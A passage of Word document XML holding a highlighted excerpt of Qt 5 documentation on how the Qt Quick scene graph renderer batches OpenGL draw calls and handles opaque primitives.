        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44A62" w:rsidRDefault="00815754" w:rsidP="00F44A62">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/visualcanvas_list.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00815754">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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png"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"http://doc.qt.io/qt-5/images/visualcanvas_list.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1044" type="#_x0000_t75" alt="" style="width:122.7pt;height:129.6pt">
            <v:imagedata r:id="rId2051" r:href="rId2052"/>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Pr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00E6674F" w:rsidRDefault="00815754" w:rsidP="00F44A62">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simplest</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> way of drawing this list is on a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cell-by-cell basis</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. First the background is drawn. This is a rectangle of a specific color. In </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL terms</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> this means selecting a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shader program to do solid color fills</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setting up the fill color</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setting the transformation matrix containing the x and y offsets and then using for instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>glDrawArrays</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to draw two triangles making up the rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The icon is drawn next. In OpenGL terms this means </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>selecting a shader program to draw textures</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>selecting the active texture to use</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setting the transformation matrix</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enabling alpha-blending</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>then using for instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>glDrawArrays</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to draw the two triangles making up the bounding rectangle of the icon</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The text and separator line between cells follow a similar pattern. And this process is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>repeated for every cell in the list</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, so for a longer list, the overhead imposed by OpenGL state changes and draw calls completely outweighs the benefit that using a hardware accelerated API could provide.</w:t>
      </w:r>
      <w:r w:rsidR="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E6674F" w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Overhead problem demonstration.</w:t>
      </w:r>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FA187A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When each primitive is large, this overhead is negligible, but in the case of a typical UI, there are many small items which add up to a considerable overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA187A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">default scene graph renderer works within these limitations and will try to merge individual primitives together into batches while preserving the exact </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA187A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>same visual result</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA187A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>result is fewer OpenGL state changes and a minimal amount of draw calls, resulting in optimal performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="007959FF">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1681" w:name="opaque-primitives"/>
      <w:bookmarkStart w:id="1682" w:name="_Toc483000895"/>
      <w:bookmarkStart w:id="1683" w:name="_Toc483003886"/>
      <w:bookmarkStart w:id="1684" w:name="_Toc483604239"/>
      <w:bookmarkStart w:id="1685" w:name="_Toc483605459"/>
      <w:bookmarkEnd w:id="1681"/>
      <w:r w:rsidRPr="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Opaque Primitives</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1682"/>
      <w:bookmarkEnd w:id="1683"/>
      <w:bookmarkEnd w:id="1684"/>
      <w:bookmarkEnd w:id="1685"/>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815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The rende</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA187A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rer separates between opaque primitives and primitives which require alpha blending</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. By using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA187A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL's Z-buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and giving each primitive a unique z position, the renderer can </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA187A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>freely reorder opaque primitives</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> without any regard for their location on screen and which other elements they overlap with</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA187A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. By looking at each primitive's material state, the renderer will create opaque batches</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. From Qt Quick core item set, this includes </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA187A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle items with opaque colors</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA187A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fully opaque images, such as JPEGs or BMPs</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Another </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA187A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>benefit of using opaque primitives, is that opaque primitives does not require</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA187A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA187A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GL_BLEND</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA187A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA187A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to be enabled which can be quite costly, especially on mobile and embedded GPUs</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="002352BA" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Opaque primitives are rendered in a front-to-back manner</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with</w:t>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>glDepthMask</w:t>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GL_DEPTH_TEST</w:t>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">enabled. On </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GPUs that internally do early-z checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, this </w:t>
      </w:r>
      <w:r w:rsidRPr="009A641D">
        <w:rPr>
